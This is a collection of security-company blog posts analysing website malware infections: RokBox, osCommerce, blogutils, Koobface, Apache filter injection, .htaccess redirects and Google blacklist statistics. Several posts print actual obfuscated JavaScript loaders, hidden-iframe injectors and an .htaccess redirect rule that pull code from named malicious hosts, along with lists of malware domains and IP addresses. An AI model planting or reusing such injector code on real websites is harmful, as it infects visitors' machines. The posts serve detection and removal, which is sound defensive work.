Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one’s website through vulnerabilities in the plugin itself.

A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63″ all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.

How should I protect my site
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklist, javascript, Joomla, malware, rokbox, RokBox.js, Wordpress

Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware.

We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

The attack
Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are prime vector to embed malware on a website to infect visitors and customers.

A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

Sites distributing the malware:

roybeth.com
schenkenbrunn.at
puremojofoto.com
pindating.com
nadobolchetrafa.cx.cc

Compromised websites in the wild
One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.

A sample of the actual malware:

i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js”,ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }

A more detailed description of how the malware is appended is presented in one of our previous posts.

      this.hook.enabled = 1;

        // Cache so updates are infrequent.
        tiles.old = {
                w: elmW,
                h: elmH,
                x: bgX,
                y: bgY,
                r: bgR
        };
};
var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }

Recommended steps
First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your “admin” directory or renaming the directory to a value different than the default can mitigate automated attacks.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security blacklist, blacklisting, javascript, malware, oscommerce, php

A recent spate of hacking incidents has led to the compromise of the popular website blogutils.net. Blogutils.net provides website utilities like visit counters that can be embedded on websites built using popular software.

Many websites, including some accounts created on tumblr.com have been recently blacklisted by Google. The primary reason for this is the compromise of blogutils.net which has allowed malware to be distributed on these benign sites via utilities like counters that are used by website around the world.

Website names on tumblr.com have the following format:

some-name.tumblr.com

About the attack
Websites that are facing this problem may see malware links to some of the sites listed below via malicious iframes and redirections.

dbncawbp.cz.cc

A screenshot of the blogutils.net website being blacklisted by Google is shown below.

A screenshot of the blogutils.net website as blacklisted by Google

How to remove the malicious code
If you are facing this problem on your site, remove the blogutils.net code (e.g. a visitor counter) for the time being. When blogutils.net has recovered from the attack you may re-enable the utility code on your website.

We will post more details in forthcoming posts.

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security blacklist, blogutils, hack, malware

Google announced today that the fight to detect web-based malware is far from over. The problem is growing and changing every day. Websites must be protected to prevent the spread of web-based malware.

From the Article

Google issued a new study on Wednesday detailing how it is becoming more difficult to identify malicious websites and attacks, with antivirus software proving to be an ineffective defense against new ones.

Read More: Google highlights trouble in detecting Web-based malware

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Security blacklist, blacklisted websites, google, malicious websites, malware, safebrowsing, Security

Malware authors are constantly coming up with new ways to compromise web sites. Now malicious hackers have started to focus on the weakest link in the security chain, web sites, breaking in and then using them to distribute dangerous viruses. This spreads malware on PCs which are then used to form bot networks of compromised PCs.

Customer data and the reputation of the web site and the online business is at stake. In this article, we highlight a malware detected way back in 2008 that hackers are still using to infect web sites on Facebook and other social networking portals. We show some samples of the malware which can be used to identify infected websites which are spreading Koobface, and what hosting companies and website owners can do to stop the spread of this malware.

What is Koobface?
Koobface can be classified as a computer worm. This malware targets users of social networks such as Facebook, hence the name Koobface. This piece of malware is extremely prevalent and the details are discussed below. Interestingly, this malware uses a well known mechanism that we have blogged about extensively in the past: stealing FTP credentials for websites, Facebook, and other social networking portals. Users on Mac, Windows and, to an extent, Linux operating systems are affected.

Koobface is Not New
It was detected way back in 2008, with new variations coming in 2009 and later. Once this malware successfully infects a clients machine, it can join a command and control channel or communicate peer-to-peer with other infected PCs or “bots.” This malware hijacks user search results, displays ads for Fake Anti-Virus products, and more.

How it Operates
Koobface sends messages to “friends” of the user whose profile has been compromised. Once the recipient opens the message and clicks on the links, the unsuspecting user is sent to an infected website where they are asked to download malicious software posing as an Adobe Flash player update.

Once the recipient of the message installs the malicious “update,” Koobface can now hijack their search queries, prevent the infected client’s browser from navigating to well known security websites (a DNS filter module is also downloaded), and send them to other infected websites. The unsuspecting user’s PC is now compromised.

Koobface has been given various names by Anti-Virus companies:

• Worm:Win32/Koobface.gen!F
• Net-Worm.Win32.Koobface.a (which attacks MySpace)
• Net-Worm.Win32.Koobface.b (which attacks Facebook)
• WORM_KOOBFACE.DC (which attacks Twitter)
• W32/Koobfa-Gen (which attacks Facebook, MySpace, hi5, Bebo, Friendster, myYearbook, Tagged, Netlog, Badoo and fubar)
• W32.Koobface.D
• and others…

Security Implications
The Koobface malware will attempt to steal FTP credentials to your websites and login information for FaceBook and other accounts. As a second step, your websites will be infected with the malware shown below. Finally, the malware installed on your websites will attempt to infect all your visitors, subsequently destroying the reputation of your website, driving away potential customers and lowering revenue.

The malware also posts malicious entries on your Facebook wall, using your profile to spread malware in social networks. This makes you an unwilling party to the infection of your friends and others who click on links in your profile and emails sent from your account.

Signs of Compromise (Server Side)
Infected websites spreading Koobface malware usually have a piece of obfuscated JavaScript code inserted near the HTML HEAD tags used to redirect a visitor to a website which hosts the actual malicious payload. When Koobface infects websites, it creates a random directory on the server with names similar to the following: “police,” or “copper.”

Interestingly, we have found that the string “kroteg” is present on infected sites. This has also been confirmed by other security researchers.

The code in the HEAD section of the web page is similar to the following:

d7h1db='do';d2akka91="cburnkmfji".replace(/[bnrkfji]+/g,"");

A URL to the infected page would look similar to:

http://www.compromisedsite.com/police/?go

An example blacklisted site (Live):

http://www.sfighters.yoyo.pl/freevideo/?go

How to Detect Infection (Client Side)
Several Anti-Viruses attempt to detect this malware at the client side.

• Symantec
• Kaspersky
• 2 Spyware
• Norman
• eSoft

Steps to Take
At StopTheHacker, we are tracking our detection of this malware as it affects web sites and servers on the Internet and working to prevent its spread to stop millions of accounts from being compromised.

All website administrators should search for new unrecognized files and directories, new SWF files, and files containing the string “kroteg” on the server.

We Can Help!
If you want to protect your site from infection, or you need additional support, sign up for one of our services. Please contact us with your comments or questions.

Report, Security blacklist, detect, Facebook, koobface, malware

Malware authors are constantly coming up with new ways to compromise web sites. Now the weakest link in the security chain, malicious hackers have started to focus on web sites, breaking in and then using them to distribute dangerous viruses. This spreads malware on PCs which are then used to form bot networks of compromised web sites. Customer data and the reputation of the web site and the online business is at stake. In this article, we will highlight a relatively new way that hackers can infect websites.

Apache Filter Based Malware
We have recently noted a new development in the world of web-malware. Malicious hackers have recently begun using the Apache Web Server’s filter module to inject malware into web pages. This process works in a similar way having the mailman stick a piece of gum (highly unlikely in real life) on the nice and clean envelope that you put into the mailbox. The recipient of the envelope might complain to you about the piece of gum (malware), and most people would be at a loss to determine whether it came from you.

This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web server softwares in use today. This software is extremely flexible, scalable and very reliable. No wonder it is a good choice for webmasters, web hosts, website owners and such. Malicious hackers are banking on the popularity of Apache to provide them with the most bang for the buck.

Apache through its flexibility, offers programmers the ability to create “filters.” The job of a filter is to allow real time analysis and modification of web page data. For example, if you wanted to add an advertisement to every page served from the webserver, this functionality would be of great use. Now filters are being abused by malicious hackers. These filters are being used to insert a piece of malware containing an iframe like the one below.

This piece of malware leads to a fake AV site:

iframe src="http://crocabhysanr4.cz.cc/[scrubbed]"

Even though this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

Nuances
To clarify , this new kind of malware injection does not imply that Apache is compromised or has vulnerabilities. The Apache “filter” functionality is a feature that is being exploited by malicious hackers who have gained unauthorized access to a web server. This attack is extremely effective, since it can “infect” every page on the web server without changing a single file.

In the past there have been other .htaccess based malware which try to evade detection by only serving infected web pages when a user visits the compromised site via a search engine like Google. This malware is much more sophisticated. It injects malware into outgoing HTML pages from the webserver, but only according to the following rules.

The malware is not injected into outgoing webpages if:

• The incoming HTTP request is coming from an IP which belongs to a search engine
• The incoming HTTP request is coming from certain browser User Agents
• The administrator is logged in or an administrator owned process is running

Additionally, the very first time a user requests a page a session token is created for the connection, but the malware is not delivered this first time. The malware is delivered the second time that the same user, using the same session, makes a request for a web page. Interestingly, this process only serves the malware only once and adds the IP address of the user to a list so that it does not try to infect the same host again and again. This helps the malware reduce its probability of detection by Anti-Virus.

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

Report, Security apache, blacklist, iframe, malware, suspicious code

Malicious hackers are compromising websites in droves. Over 6,600 websites are hacked everyday and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

In the vast majority of cases, affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article, we will discuss a new strain of malware that has already infected thousands of legitimate websites (at least 1,163, at last count, are affected by g-oogl-e.com).

What does this attack do?
This particular attack infects the .htaccess file on web servers and redirects visitors to sites serving malware.

One particular website used to spread the malware is g-oogl-e.com, which plays on the google.com domain name in order to trick unsuspecting visitors into trusting the site. See below for a list of the malware host sites and their associated internet addresses (IPs).

Malware hosts:

g-oogl-e.com            91.201.66.38
12583497154.ru          46.252.129.0
uploadfriends2010.ru    91.216.122.0

Take Action
Administrators and website owners need to protect the reputation of their websites. As a first step, you must remove the malicious configuration from your “.htaccess” and “index.php” files on your hosting account.

If you choose not to take action, visitors to your website and potential customers may infected with malware, your website will be blacklisted by search engines like Google, Bing, and Yahoo, and your reputation and revenue will take a nosedive.

A compromised “.htaccess” file will have entries that look like the ones below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteRule .* http://g-oogl-e.com [R,L]

The malicious redirects found in “.htaccess” files on compromised website accounts must be deleted.

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security blacklist, g-oogl-e.com, google, htaccess, malware, redirect

Malicious hackers are infecting websites in droves using a relatively new kind of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors.

In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article we will show a new strain of malware that has already infected 43,000 websites.

Identifying the Malware
The specific piece of malware:

y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute('height','5');ov.setAttribute('style','display:none');ov.setAttribute(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');bo.setAttribute(kx,dv);document.body.appendChild(bo);

This malware adds an iframe to the infected webpage:

iframe setAttribute src = http://prw1.co.cc/forum.php?tp=74220a5e554afea7

The iframe points to two sites which are used to load the code used to infect the website visitor:

pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
prw1.co.cc/forum.php?tp=74220a5e554afea7

Growth of Infected Sites
The number of infected sites has grown significantly over the last few days. In less than a month, we have seen the number of sites more than double.

Growth in the Number of Infected Websites

Blacklist Services Not Reacting Quickly
Current website reputation services have not yet started flagging sites with this specific malware. Many infected sites have not yet been blacklisted by Google Chrome, Firefox, Bing, Yahoo or other search engines and blacklist sources. Below we present a small sample of infected sites which have not yet been blacklisted, and will infect visitors upon visiting them.

Infected sites that have not been blacklisted (As of April 23, 2011):

www.kittyshomestore.com/
muinvader.com/
zirimi.com/
ipcontext.com/
www.bonitalions.org/
www.sobragen.org.br/
www.biostyle.ru/
www.cnicanada.com/
www.ceomanitoba.com/

Anti-Virus Not Capable of Detecting the Infection
Anti-virus engines are woefully inadequate at hunting down web-malware. We present screenshots to show the poor detection capabilities of Anti-virus engines with respect to this specific piece of malware. We see below that only 1 out of 41 AV engines were able to flag the malware.

Website reputation sources fail to identify malware

Anti-Viruses fail to identify malware

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security blacklist, hack, malware

Websites are now the primary sales funnel for many businesses. Every day, billions of dollars of business is conducted by small to medium sized businesses via their web sites. Most e-commerce web sites use a piece of software called a shopping cart to allow users to pick and choose what they would like to buy and then pay via a number of payment methods.

One popular application software that web site owners use to manage online transactions is called osCommerce. Thousands of websites use this software. In the last three months we have witnessed a spate of intense attacks targeting shopping cart software like osCommerce. In this post we discuss the specifics of this attack, and how to identify the malware which is injected as a result of this intrusion.

Identifying the Malware
The malware targets osCommerce and other shopping carts by exploiting an application vulnerability to inject malware into the web site running the shopping cart – in turn, causing website visitors to become infected. This strain of malware has been extremely pervasive.

We have seen variants of the following malware on web sites running shopping cart software by osCommerce and OpenCart. The malware can be found in JavaScript, PHP, and HTML files on the infected web site.

<script type≈ "text/javascript" src≈ "catalog/view/javascript/unitpngfix/unitpngfix.js" > </ sc​ript > <script type≈ "text/javascript" >if (typeof(redef_colors)≈ ≈ "undefined") { var div_colors ≈ new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d'); var redef_colors ≈ 1; var colors_picked ≈ 0; func​tion div_pick_colors(t, styled) {var s ≈ ""; for (j≈ 0; j <t.length; j++) {var c_rgb ≈ t[j]; for (i≈ 1; i <7; i++) {var c_clr ≈ c_rgb.substr(i++, 2); if (c_clr!≈ "00") s +≈ String·fromCharCode (parseInt(c_clr, 16)-15); }}if (styled) {s ≈ s.substr(0, 36) + s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime() + s.substr((s.length-2)); } else {s ≈ s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime(); }return s; } func​tion try_pick_colors() {try { if(!document.getElementById || !document.createElement){ doc​ument.write (div_pick_colors(div_colors, 1)); } else {var new_cstyle≈ document.createElement(" sc​ript "); new_cstyle.type≈ "text/javascript"; new_cstyle.src≈ div_pick_colors(div_colors, 0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); }} catch(e) { }try {check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </ sc​ript >

What this Attack Does
The malware code attempts to display a malicious iframe which could lead the visitor to a fake Anti-Virus (AV) website. This opens the door to malware being installed on the website visitor’s personal computer.

Removing the Malware
In most shopping cart installations, malware will have been inserted in the config.php file on your website. It is usually located in the following place: www.yoursite.com/config.php.

Identify the malware in the config.php file that begins with:

<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 84, 82, 67, 83, 79, 7

The malware usually ends with a line similar to:

$ob_starting = time(); @ob_start(“ob_start_flush”); } ?>

The entire code present between the start and end signatures shown above must be removed.

Conclusion
Following removal of the malware, you must upgrade your installation of osCommerce, to osCommerce 2.3 or higher, and analyze your website for any application vulnerabilities. Securing the permission settings of your admin directory or renaming the directory to a value different from the default can mitigate automated attacks attempting to exploit osCommerce 2.2 versions.

If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security blacklist, hack, malware, opencart, oscommerce

Google’s efforts to clean up the Internet and provide a useful advisory to Internet users has been very successful. Nearly every modern browser now incorporates Google’s Safe Browsing List information, to prevent users from inadvertently visiting malware infested websites and phishing websites.

Motivation
In this article we will be analyzing the Google malware hash lists that have been published over the past few months in order to answer these important questions:

• How many websites get blacklisted each day?
• How many websites manage to get off the blacklist?
• How soon do websites get off the blacklist?
• How many never get off the blacklist?

These are practical questions which are often posed by frustrated, sometimes confused and angry website owners, time and time again at help forums, and via our contact page.

Resources
Google has done a good job creating detailed help content describing the process of blacklisting, as well as a group where website owners can ask for help. Additionally there are excellent resources like BadwareBusters where users can find volunteers to help them. We also participate in these groups.

Yet, there is still a demand for getting clear cut answers to some basic questions like the ones detailed above. In this vein we want to provide scientifically sound and statistically significant analysis of freely available information to provide clear answers to these questions. A small FAQ is also available on our site to answer questions from website owners and admins.

Goals
This series of experiments is split into multiple parts. This article presents a first look (part 1) at openly available data. The goal of the experiment is to understand:

• How many websites get blacklisted each day?
• How many websites manage to get off the blacklist?
• How soon do websites get off the blacklist?
• How many never get off the blacklist?
• How many websites fall back onto the blacklist?
• How much time elapses before a website falls back into the blacklist?

Methodology
For the purposes of this experiment, Google malware hash lists were collected from March 3, 2010 to June 1, 2010 (113 days). Malware hash lists were collected every 30 minutes. Each malware hash list contains the information in the Google malware hash specification. All hash lists were parsed and unique hashes were extracted and time stamped, and correlated with the malware hash list version.

Subsequently an analysis was conducted to answer the questions posed above. At no point was an attempt identify a website name from the hashes. Also, note that a single website can have more than one unique hash. For example: “www.abcd.com”, “abcd.com”, and “www.abcd.com/infected/” can all generate different hashes.

Brief Highlights

• Total number of unique hashes tracked: 688,602.
• Average number of unique hashes per day (over 113 day period): 6093.
• 25.8% of hashes never got off the Google blacklist.
  Each one of these unique hashes was deemed infected for over 3 months (greater than 113 days).
• 43% of hashes were listed exactly once as infected and managed to get off the Google blacklist.
  The average time each of these hashes was blacklisted was 13 days (89 days max).
• 2% of hashes were blacklisted exactly twice.
  Each one of these hashes was blacklisted, was then removed from the blacklist and then fell back in (the sites were hacked again). These sites remained infected for an average of 19 days (89 days max), and remained clean for an average of 17 days before being hacked again.

Analysis
It is clear from these initial results that a very large number of websites, nearly one quarter of the 6000 hashes added per day never make it off the Google blacklist. There are a number of reasons for this. One being that most webmasters, who may be good at website design and layouts, may not have the technical skills which are required to clean websites infected by malware and code injection attacks. We have also met website owners who are extremely business savvy, but lack the technical expertise to recover from a blacklisting event. The income lost due to business interruption in these cases is considerable.

We see that 43% of websites which get blacklisted manage to make it off the blacklist, but these websites suffer for an average period of 13 days.

Some websites manage to get off the blacklist and then fall in again. The average time for these “repeat offenders” on the blacklist is larger than the previous case. The time for which these “repeat offenders” stay clean is not very high, an average of just 17 days.

Conclusion
These numbers clearly show the current sorry state of website security. It is unfortunate that thousands of websites are affected every day. At stopthehacker.com, we strive to help combat this trend.  These issues need to be addressed specifically by services that currently are not readily available to the masses. To address this vacuum in the service space, and disrupt the security market stopthehacker.com provides its advanced Health Monitoring and Vulnerability assessment services for website owners. Our services take away the anguish which business owners face when their websites are attacked. Please visit our services page to find out how we can help you. In fact, you can even sign up for free services.

Further detailed analysis will be presented in the second part of this series. We will show detailed analysis of the data and will provide more insight on the implications of these observations.

Stay tuned for Part 2!

News, Report, Security analysis, blacklist, google, malware, monitoring